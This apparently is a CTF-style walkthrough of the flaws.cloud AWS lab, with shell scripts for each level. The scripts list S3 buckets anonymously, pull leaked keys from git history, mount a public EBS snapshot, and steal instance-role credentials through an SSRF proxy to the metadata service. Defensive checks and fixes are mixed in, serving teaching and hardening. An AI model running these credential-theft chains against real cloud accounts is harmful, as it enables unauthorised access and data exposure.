Cloud pentesting using the AWS platform and the flaws.cloud web series to work through insecure S3 buckets, authentication, the instance metadata service and access to EC2 instances.
Legal Notice && Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage, directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only perform testing on systems you OWN and/or have express written permission to test. Use the information at your own risk. By continuing, you acknowledge the aforementioned user risk/responsibilities.
Through a series of levels you’ll learn about common mistakes and gotchas when using Amazon Web Services (AWS). There are no SQL injection, XSS, buffer overflows, or many of the other vulnerabilities you might have seen before. As much as possible, these are AWS specific issues. A series of hints are provided that will teach you how to discover the info you’ll need. If you don’t want to actually run any commands, you can just keep following the hints which will give you the solution to the next level. At the start of each level you’ll learn how to avoid the problem the previous level exhibited. Scope: Everything is run out of a single AWS account, and all challenges are sub-domains of flaws.cloud.
Level 1 - Enumerate AWS
This level is buckets of fun. See if you can find the first sub-domain. Need a hint?
A DNS lookup of flaws.cloud, followed by a reverse lookup of the returned address, resolves to s3-website-us-west-2.amazonaws.com: the site is served from S3 static website hosting in us-west-2.
With website hosting the bucket name must match the hostname, so the bucket can be addressed directly: http://flaws.cloud.s3-website-us-west-2.amazonaws.com/
Install AWS CLI
Check the install with a version check.
Access S3 Bucket with AWS CLI
Listing the bucket anonymously shows a file named secret-dd02c7c.html, which looks interesting.
Navigate to secret http://flaws.cloud/secret-dd02c7c.html
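The Level 1 steps above (DNS lookup, deriving the bucket address from the hostname, listing the bucket without credentials) as one script. This is an added example, not code from the original post. It assumes dig and the AWS CLI are installed, and it uses an environment variable FLAWS_LIVE=1 (an assumption of this example) to gate the network calls so the helper functions can be exercised offline.

```sh
#!/bin/sh
# Added example, not code from the original post: Level 1 recon helpers.
# Assumptions: the target is served by S3 static website hosting, dig and
# the AWS CLI are installed for the live steps, and FLAWS_LIVE=1 is set only
# when network calls are wanted (an assumed environment variable).
set -e

# Extract the region from the hostname a reverse lookup returns, e.g.
# s3-website-us-west-2.amazonaws.com -> us-west-2 (the dash form the post
# saw; a trailing dot from dig is tolerated). Prints nothing for other hosts.
region_from_s3_host() {
    printf '%s\n' "$1" | sed -n 's/^s3-website-\([a-z0-9-]*\)\.amazonaws\.com\.*$/\1/p'
}

# With static website hosting the bucket name must equal the hostname, so
# once the region is known the bucket can be addressed directly.
s3_website_url() {
    printf 'http://%s.s3-website-%s.amazonaws.com/\n' "$1" "$2"
}

# The same bucket as the CLI names it.
s3_bucket_uri() {
    printf 's3://%s\n' "$1"
}

# Live recon: resolve the site, reverse-resolve the address, and if it is an
# S3 website endpoint list the bucket anonymously. --no-sign-request sends
# an unauthenticated request, which is exactly what an 'Everyone' grant allows.
recon_s3_site() {
    site="$1"
    ip=$(dig +short "$site" | head -n 1)
    ptr=$(dig +short -x "$ip" | head -n 1)
    region=$(region_from_s3_host "$ptr")
    if [ -z "$region" ]; then
        echo "$site does not resolve to an S3 website endpoint (PTR: $ptr)" >&2
        return 1
    fi
    echo "bucket: $(s3_website_url "$site" "$region")"
    aws s3 ls "$(s3_bucket_uri "$site")" --no-sign-request --region "$region"
}

# Offline demonstration on the values the post's lookup produced.
echo "region: $(region_from_s3_host s3-website-us-west-2.amazonaws.com)"
s3_website_url flaws.cloud us-west-2

if [ "${FLAWS_LIVE:-0}" = 1 ]; then
    recon_s3_site flaws.cloud
fi
```

Run it with FLAWS_LIVE=1 to perform the actual lookup and listing; without it the script only shows how the bucket address is derived.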
Level 2 - Insecure S3 Buckets
Level 2 is at http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
S3 buckets are private by default, but if the bucket ACL has been modified to grant the Everyone group list access, anyone who requests the bucket URL can list its contents, without any AWS account at all.
That was the Level 1 flaw: an Everyone grant on https://flaws.cloud.s3.amazonaws.com/
Creating an IAM user on AWS: within the AWS dashboard search for IAM.
Add a user under “Users”.
Create the username and select programmatic access (an access key).
Attach the user to a group, in this case “AdminS3”, which can be created with “Create Group”. The user needs S3 read permissions in your own account; the Level 2 bucket itself grants access to any authenticated AWS principal.
Add additional tags if needed for organization.
Review and create the user.
Important: the Secret Access Key is displayed ONLY at this point; if lost it will need to be regenerated.
Configure the AWS CLI on Linux. The configure command prompts for:
Enter AWS Access Key ID: ###…###
Enter AWS Secret Access Key: ###…###
Enter Region: us-east-1
Enter Default Output: json
The CLI stores these in plain-text files: the keys in ~/.aws/credentials and the region and output format in ~/.aws/config. Note that the flaws.cloud buckets live in us-west-2, so either set that region or pass it on the command line.
Access the S3 bucket again, this time signing the request with the new account's keys.
Level 3 - S3 Buckets Authenticated AWS Users
The next level is at http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
Similar to the “Everyone” grant, permissions can be granted to “Any Authenticated AWS User”, which leaves the S3 bucket exposed as well: that group means any principal from any AWS account in the world, not just users of your own account, so a free account with a single access key is enough to get in.
This was an older setting and is no longer available in the web console, but the SDKs and third-party tools sometimes still use it.
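An audit for the two grants behind Levels 1 and 2 (the “Everyone” grant, which is the AllUsers group, and “Any Authenticated AWS User”, the AuthenticatedUsers group), together with the settings that lock a bucket you own back down. This is an added example, not code from the original post; it assumes the AWS CLI for the live calls, gated by an assumed FLAWS_LIVE=1 environment variable, and the offline demonstration runs on constructed ACL output.

```sh
#!/bin/sh
# Added example, not code from the original post: audit a bucket ACL for
# the two group grants behind Levels 1 and 2 (Everyone = AllUsers, Any
# Authenticated AWS User = AuthenticatedUsers) and lock a bucket you own
# down. Assumes the AWS CLI for the live calls, enabled with FLAWS_LIVE=1
# (an assumed environment variable); the offline demo uses constructed input.
set -e

ALL_USERS_URI='http://acs.amazonaws.com/groups/global/AllUsers'
AUTH_USERS_URI='http://acs.amazonaws.com/groups/global/AuthenticatedUsers'

# stdin: one "<grantee URI or None><tab><permission>" line per grant, as printed by
#   aws s3api get-bucket-acl --bucket B --query 'Grants[].[Grantee.URI,Permission]' --output text
# stdout: "AllUsers READ" style lines for each group grant. Returns 1 when any
# were found so the function can gate a script. Grants to specific canonical
# users print "None" as the URI and are ignored: they are not public.
public_grants() {
    tab=$(printf '\t')
    found=0
    while IFS=" $tab" read -r uri perm; do
        case "$uri" in
            "$ALL_USERS_URI")  printf 'AllUsers %s\n' "$perm"; found=1 ;;
            "$AUTH_USERS_URI") printf 'AuthenticatedUsers %s\n' "$perm"; found=1 ;;
        esac
    done
    return "$found"
}

audit_bucket() {
    aws s3api get-bucket-acl --bucket "$1" \
        --query 'Grants[].[Grantee.URI,Permission]' --output text | public_grants
}

# Remediation for a bucket you own: reset the ACL to owner-only and turn on
# Block Public Access, which also rejects AuthenticatedUsers grants from then on.
lock_down_bucket() {
    aws s3api put-bucket-acl --bucket "$1" --acl private
    aws s3api put-public-access-block --bucket "$1" \
        --public-access-block-configuration \
        BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true
}

# Offline demonstration on a constructed ACL: an owner grant plus the
# AllUsers list grant that made Level 1 browsable.
sample_acl=$(printf 'None\tFULL_CONTROL\n%s\tREAD\n' "$ALL_USERS_URI")
if printf '%s\n' "$sample_acl" | public_grants; then
    echo "no public grants"
else
    echo "bucket is public"
fi

if [ "${FLAWS_LIVE:-0}" = 1 ]; then
    audit_bucket flaws.cloud || echo "flaws.cloud is public (as expected)"
fi
```

The parser deliberately works on the CLI's text output rather than its JSON so it needs nothing beyond grep-style tooling; the same check can be looped over every bucket returned by a bucket listing.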
Find the AWS key.
The bucket https://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud.s3.amazonaws.com/ contains a .git directory (its config file and objects are listed), so the repository history can be recovered.
Download the entire S3 bucket locally.
Inspect the git log.
Note the commit message mentioning an accidental commit; the earlier commit is the one to look at.
Check out the earlier commit.
Listing the checked-out directory reveals access_keys.txt.
Configure a new AWS profile with these keys.
The listing succeeds, so the leaked keys are still valid.
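The Level 3 procedure above, generalised to searching every commit in the recovered history rather than checking out one commit by hand: a key that was "removed" in a later commit is still in the object store and shows up as a deleted line in the diff. This is an added example, not code from the original post; it assumes the AWS CLI and git for the live steps (gated by an assumed FLAWS_LIVE=1 environment variable), and the offline demonstration runs on a constructed diff using AWS's documented example key pair, not a real credential.

```sh
#!/bin/sh
# Added example, not code from the original post: pull a bucket that
# exposes its .git directory and search the whole history for AWS keys,
# including lines a later commit deleted. Assumes the AWS CLI and git for
# the live steps (FLAWS_LIVE=1, an assumed environment variable). The
# offline demo runs on a constructed diff using AWS's documented example
# key pair, not a real credential.
set -e

# Access key IDs are 20 characters: AKIA (long-term IAM user keys) or ASIA
# (temporary STS keys) followed by 16 uppercase letters or digits.
find_aws_keys() {
    grep -oE '(AKIA|ASIA)[0-9A-Z]{16}' | sort -u
}

# Secret keys are 40 characters of base64-like text; only lines that also
# mention "secret" are considered, so 40-hex-char commit hashes stay out.
find_aws_secrets() {
    grep -i 'secret' | grep -oE '[A-Za-z0-9/+]{40}' | sort -u
}

# The bucket contents (Level 3 lists anonymously), then the history.
pull_bucket() {
    aws s3 sync "s3://$1" "$2" --no-sign-request --region us-west-2
}

# "git log -p --all" prints every commit's diff; a secret removed in a later
# commit still appears as a "-" line from the commit that added it.
scan_git_history() {
    git -C "$1" log -p --all --format='commit %H %s' | find_aws_keys
}

# Which commit introduced a given key (pickaxe search on the content).
key_origin() {
    git -C "$1" log --all -S "$2" --format='%H %s'
}

# Offline demonstration on a constructed diff (labelled as such).
sample_diff=$(cat <<'EOF'
commit 0000000000000000000000000000000000000000 constructed: removed a file
diff --git a/access_keys.txt b/access_keys.txt
--- a/access_keys.txt
+++ /dev/null
-access_key AKIAIOSFODNN7EXAMPLE
-secret_access_key wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
EOF
)
echo "keys:    $(printf '%s\n' "$sample_diff" | find_aws_keys)"
echo "secrets: $(printf '%s\n' "$sample_diff" | find_aws_secrets)"

if [ "${FLAWS_LIVE:-0}" = 1 ]; then
    pull_bucket level3-9afd3927f195e10225021a578e6f78df.flaws.cloud ./level3
    scan_git_history ./level3
fi
```

The same two filters are useful on the defensive side as a pre-commit or CI check over a diff, which is where the leaked key should have been caught in the first place.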
Level 4 - EBS Snapshots: create an instance and attach the snapshot
The next level is at http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud
Note: always roll keys if you suspect they were compromised; removing them from the current commit does nothing, as the last level showed.
For the next level, you need to get access to the web page running on an EC2 at 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud
Identify the account ID the Level 3 keys belong to.
Account ID: 975426262029
View EC2 backups (EBS snapshots) owned by that account. The snapshots are in us-west-2, so add region = us-west-2 to the profile in ~/.aws/config.
Describe snapshots.
Create a volume from the snapshot ID.
Ensure under AWS IAM that the user in your own account has permission to create volumes (the author attached AdministratorAccess), or the call will fail.
Launch a new EC2 instance in us-west-2, select “Free Tier”, and under Add Storage attach the volume created from snapshot snap-0b49342abd1bdcb89 as device /dev/sdf.
SSH to newly created instance
List the block devices; the volume attached as /dev/sdf appears inside the guest under a different name (/dev/xvdf on Xen-based instance types such as t2, an NVMe device on Nitro types).
View drive information.
Mount the drive (read-only is sufficient for inspection).
Discover interesting files: within /home/ubuntu a file containing a cleartext password is found, setupNginx.sh, which sets up the web site's HTTP basic-auth credentials.
Log in to the web service at http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/ with the discovered credentials to gain access to Level 5.
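The Level 4 chain above as a script: enumerate the victim account's snapshots, confirm one is shared with the “all” group (which is what lets a different account create a volume from it), attach it to an instance you control and mount it read-only. This is an added example, not code from the original post. It assumes the AWS CLI, a profile holding the Level 3 keys (assumed variable FLAWS_PROFILE, default level3), an EC2 instance of yours in us-west-2 (assumed variable FLAWS_INSTANCE) and an assumed FLAWS_LIVE=1 gate; the offline demonstration parses constructed CLI text output.

```sh
#!/bin/sh
# Added example, not code from the original post: find EBS snapshots an
# account has shared publicly, confirm who may create volumes from one, and
# attach and mount it on an instance you control. Assumes the AWS CLI, a
# profile with the Level 3 keys (FLAWS_PROFILE, default level3), an EC2
# instance of yours in us-west-2 (FLAWS_INSTANCE) and FLAWS_LIVE=1 for the
# network calls; all three are assumed environment variables. The offline
# demo parses constructed CLI text output.
set -e

REGION=us-west-2

# stdin: text output of
#   aws ec2 describe-snapshots --owner-ids A --query 'Snapshots[].[SnapshotId,VolumeSize,Description]' --output text
# stdout: the snapshot IDs only.
snapshot_ids() {
    grep -oE '^snap-[0-9a-f]{8,17}' | sort -u
}

# stdin: text output of
#   aws ec2 describe-snapshot-attribute --snapshot-id S --attribute createVolumePermission \
#       --query 'CreateVolumePermissions[].Group' --output text
# Returns 0 when the "all" group is present, i.e. any AWS account can copy it.
snapshot_is_public() {
    grep -qx 'all'
}

# The console/API name /dev/sdf shows up inside a Xen-based guest as /dev/xvdf.
# On Nitro instances the volume appears as /dev/nvme1n1 instead; check lsblk.
guest_device() {
    case "$1" in
        /dev/sd?) printf '/dev/xvd%s\n' "${1#/dev/sd}" ;;
        *)        printf '%s\n' "$1" ;;
    esac
}

# With the stolen keys: list the victim account's snapshots.
list_account_snapshots() {
    aws ec2 describe-snapshots --region "$REGION" --profile "${FLAWS_PROFILE:-level3}" \
        --owner-ids "$1" \
        --query 'Snapshots[].[SnapshotId,VolumeSize,Description]' --output text
}

check_snapshot_public() {
    aws ec2 describe-snapshot-attribute --region "$REGION" --profile "${FLAWS_PROFILE:-level3}" \
        --snapshot-id "$1" --attribute createVolumePermission \
        --query 'CreateVolumePermissions[].Group' --output text | snapshot_is_public
}

# With your own default profile: create a volume from the public snapshot in
# the instance's AZ and attach it as /dev/sdf. Prints the volume ID.
attach_snapshot() {
    snap="$1"; instance="$2"
    az=$(aws ec2 describe-instances --region "$REGION" --instance-ids "$instance" \
        --query 'Reservations[0].Instances[0].Placement.AvailabilityZone' --output text)
    vol=$(aws ec2 create-volume --region "$REGION" --snapshot-id "$snap" \
        --availability-zone "$az" --query VolumeId --output text)
    aws ec2 wait volume-available --region "$REGION" --volume-ids "$vol"
    aws ec2 attach-volume --region "$REGION" --volume-id "$vol" \
        --instance-id "$instance" --device /dev/sdf >/dev/null
    echo "$vol"
}

# Run on the instance after attaching: mount the first partition read-only
# (nothing on the copy should change) and look for scripts in home directories,
# which is where the post found setupNginx.sh.
mount_and_search() {
    dev="$(guest_device /dev/sdf)1"
    sudo mkdir -p /mnt/snap
    sudo mount -o ro,noexec,nosuid "$dev" /mnt/snap
    sudo find /mnt/snap/home -maxdepth 2 -name '*.sh' -exec grep -l -i 'passw' {} +
}

# Offline demonstration on constructed output.
echo "ids: $(printf 'snap-0b49342abd1bdcb89\t8\tNone\n' | snapshot_ids)"
echo "guest device for /dev/sdf: $(guest_device /dev/sdf)"
if printf 'all\n' | snapshot_is_public; then echo "sample snapshot is public"; fi

if [ "${FLAWS_LIVE:-0}" = 1 ]; then
    list_account_snapshots 975426262029
    check_snapshot_public snap-0b49342abd1bdcb89 && echo "snapshot is public"
    attach_snapshot snap-0b49342abd1bdcb89 "$FLAWS_INSTANCE"
fi
```

The public check is the one to run across your own account as a defender: any snapshot whose createVolumePermission includes the “all” group can be copied by anyone, regardless of what the keys that created it can or cannot do.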
Level 5 - 169.254.169.254 Metadata Service
Good work getting in. This level is described at http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/
AWS EC2 instances include an instance metadata service at 169.254.169.254. That is a link-local address (RFC 3927), reachable only from the instance itself; among other things it serves the temporary credentials of the IAM role attached to the instance, which is why a web proxy that fetches arbitrary URLs on the instance's behalf is so dangerous.
Accessing Metadata Service of flaws.cloud http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/
Listing the metadata categories for the EC2 instance.
Latest metadata, security credentials: http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
A new access key and secret key are returned, along with a session token, for the instance's IAM role.
Create a level5 AWS profile with these credentials in ~/.aws/credentials and ~/.aws/config. Because these are temporary credentials, the credentials entry must include aws_session_token alongside the key ID and secret key, or every call will be rejected.
Access level 6
Navigate to directory http://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/
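The Level 5 procedure above (fetch the role credentials through the proxy, write them to a profile with the session token, use them) and the IMDSv2 setting that stops a GET-only proxy from doing this. This is an added example, not code from the original post; it assumes curl and the AWS CLI for the live steps, gated by an assumed FLAWS_LIVE=1 environment variable, and the offline demonstration parses a constructed credentials document whose values are made up.

```sh
#!/bin/sh
# Added example, not code from the original post: read the instance role's
# temporary credentials through the Level 5 proxy, turn them into a CLI
# profile (the session token is mandatory) and apply the IMDSv2 setting that
# stops this class of SSRF. Assumes curl and the AWS CLI for the live steps,
# enabled with FLAWS_LIVE=1 (an assumed environment variable); the offline
# demo parses a constructed credentials document with made-up values.
set -e

PROXY='http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy'
IMDS="$PROXY/169.254.169.254/latest/meta-data"

# Pull one string field out of the pretty-printed credentials document on
# stdin. The document is flat, one field per line, so a sed capture is enough.
json_field() {
    sed -n "s/.*\"$1\" *: *\"\([^\"]*\)\".*/\1/p"
}

# Render a ~/.aws/credentials stanza. IMDS/STS credentials are temporary and
# are rejected without aws_session_token; that is why these keys start with ASIA.
credentials_stanza() {
    printf '[%s]\naws_access_key_id = %s\naws_secret_access_key = %s\naws_session_token = %s\n' \
        "$1" "$2" "$3" "$4"
}

# Live: the role name is listed under iam/security-credentials/, the
# credentials document is under that name.
steal_role_creds() {
    role=$(curl -s "$IMDS/iam/security-credentials/" | head -n 1)
    doc=$(curl -s "$IMDS/iam/security-credentials/$role")
    key=$(printf '%s\n' "$doc" | json_field AccessKeyId)
    secret=$(printf '%s\n' "$doc" | json_field SecretAccessKey)
    token=$(printf '%s\n' "$doc" | json_field Token)
    credentials_stanza level5 "$key" "$secret" "$token" >> ~/.aws/credentials
    aws sts get-caller-identity --profile level5
    aws s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud --profile level5 --region us-west-2
}

# Defence for an instance you own: require IMDSv2. Credentials are then only
# returned to requests carrying a token obtained with a PUT, which a GET-only
# proxy like Level 5's cannot issue, and a hop limit of 1 keeps the PUT
# response from crossing a NAT hop such as a container bridge.
harden_imds() {
    aws ec2 modify-instance-metadata-options --instance-id "$1" \
        --http-endpoint enabled --http-tokens required --http-put-response-hop-limit 1
}

# Offline demonstration on a constructed document (values are not real).
sample_doc='{
  "Code" : "Success",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAEXAMPLE000000001",
  "SecretAccessKey" : "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
  "Token" : "FwoGZXIvYXdzEXAMPLETOKEN",
  "Expiration" : "2030-01-01T00:00:00Z"
}'
credentials_stanza level5 \
    "$(printf '%s\n' "$sample_doc" | json_field AccessKeyId)" \
    "$(printf '%s\n' "$sample_doc" | json_field SecretAccessKey)" \
    "$(printf '%s\n' "$sample_doc" | json_field Token)"

if [ "${FLAWS_LIVE:-0}" = 1 ]; then
    steal_role_creds
fi
```

The Expiration field in the document is worth reading too: the stolen credentials stop working when it passes, and the instance keeps fetching fresh ones, so an attacker with the proxy simply repeats the request.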
Level 6 - IAM Access Keys via EC2 User-data
Takeaway: do not allow applications to reach 169.254.169.254 on behalf of a user, and require IMDSv2 on instances so a plain GET cannot fetch role credentials.
Access Level 6 with the keys the level provides:
Add them to ~/.aws/credentials.
The user has the AWS-managed SecurityAudit policy attached, which grants read-only audit access and is what allows the IAM and Lambda enumeration below.
List policies attached to user
A custom policy named list_apigateways is attached as well.
View IAM policy
Using the policy ARN, retrieve the default policy version and its document:
The policy allows “apigateway:GET” on “arn:aws:apigateway:us-west-2::/restapis/*”.
Using the SecurityAudit permissions, list the Lambda functions.
Get the resource policy of the Lambda function.
The policy grants arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6 permission to invoke the function; “s33ppypa75” is the rest-api-id.
List the API's stages with the apigateway:GET permission: the stage name is “Prod”. Combining rest-api-id, region, stage and resource gives the URL for the Lambda behind the API: https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6
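The Level 6 chain above as a script: dump the documents of the policies attached to the caller, find the execute-api ARN in the Lambda function's resource policy, look up the stage and build the invoke URL. This is an added example, not code from the original post; it assumes a CLI profile holding the Level 6 keys (assumed variable FLAWS_PROFILE, default level6) and an assumed FLAWS_LIVE=1 gate for the live calls, and the offline demonstration parses the execute-api ARN quoted above from a constructed policy fragment.

```sh
#!/bin/sh
# Added example, not code from the original post: the Level 6 chain from the
# policies attached to a user, through the Lambda resource policy, to an
# API Gateway URL that can be called. Assumes a CLI profile holding the
# Level 6 keys (FLAWS_PROFILE, default level6) and FLAWS_LIVE=1 for the live
# calls, both assumed environment variables; the offline demo parses the
# execute-api ARN the post found.
set -e

# arn:aws:execute-api:<region>:<account>:<api-id>/<stage>/<METHOD>/<resource>
# -> "<api-id> <region> <METHOD> <resource>". The stage is usually "*" in a
# Lambda resource policy, so it has to come from apigateway get-stages.
parse_execute_api_arn() {
    printf '%s\n' "$1" | sed -n 's|^arn:aws:execute-api:\([^:]*\):[0-9]*:\([^/]*\)/[^/]*/\([A-Z*]*\)/\(.*\)$|\2 \1 \3 \4|p'
}

# Pull execute-api ARNs out of a Lambda policy document (the Policy field of
# "aws lambda get-policy" is a JSON string; with --output text it is printed raw).
extract_execute_api_arns() {
    grep -oE 'arn:aws:execute-api:[^" \\]+' | sort -u
}

# https://<api-id>.execute-api.<region>.amazonaws.com/<stage>/<resource>
invoke_url() {
    printf 'https://%s.execute-api.%s.amazonaws.com/%s/%s\n' "$1" "$2" "$3" "$4"
}

# Live: every managed policy attached to the caller, with its current document
# (get-policy names the default version; get-policy-version holds the text).
show_user_policies() {
    user=$(aws iam get-user --query User.UserName --output text)
    for arn in $(aws iam list-attached-user-policies --user-name "$user" \
                 --query 'AttachedPolicies[].PolicyArn' --output text); do
        ver=$(aws iam get-policy --policy-arn "$arn" --query Policy.DefaultVersionId --output text)
        echo "== $arn ($ver)"
        aws iam get-policy-version --policy-arn "$arn" --version-id "$ver" \
            --query PolicyVersion.Document
    done
}

# Live: SecurityAudit allows lambda:ListFunctions and lambda:GetPolicy; the
# function's resource policy says which API may invoke it, and the custom
# apigateway:GET permission lets us read that API's stages.
find_invoke_url() {
    arn=$(aws lambda get-policy --function-name "$1" --query Policy --output text \
          | extract_execute_api_arns | head -n 1)
    set -- $(parse_execute_api_arn "$arn")
    stage=$(aws apigateway get-stages --rest-api-id "$1" --query 'item[0].stageName' --output text)
    invoke_url "$1" "$2" "$stage" "$4"
}

# Offline demonstration on a constructed policy fragment carrying the ARN from the post.
sample_policy='{"Statement":[{"Effect":"Allow","Action":"lambda:InvokeFunction","Condition":{"ArnLike":{"AWS:SourceArn":"arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6"}}}]}'
arn=$(printf '%s\n' "$sample_policy" | extract_execute_api_arns)
echo "parsed: $(parse_execute_api_arn "$arn")"
invoke_url s33ppypa75 us-west-2 Prod level6

if [ "${FLAWS_LIVE:-0}" = 1 ]; then
    export AWS_PROFILE="${FLAWS_PROFILE:-level6}" AWS_DEFAULT_REGION=us-west-2
    show_user_policies
    for fn in $(aws lambda list-functions --query 'Functions[].FunctionName' --output text); do
        find_invoke_url "$fn"
    done
fi
```

Note that none of the permissions involved is an obvious write or invoke right: read-only audit access plus one custom GET permission was enough to map the whole path to an unauthenticated endpoint, which is the point of the level.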
The End
http://theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud/d730aa2b/
Takeaways: manage the permissions of everything, and never let applications proxy requests to the metadata service where the role credentials live.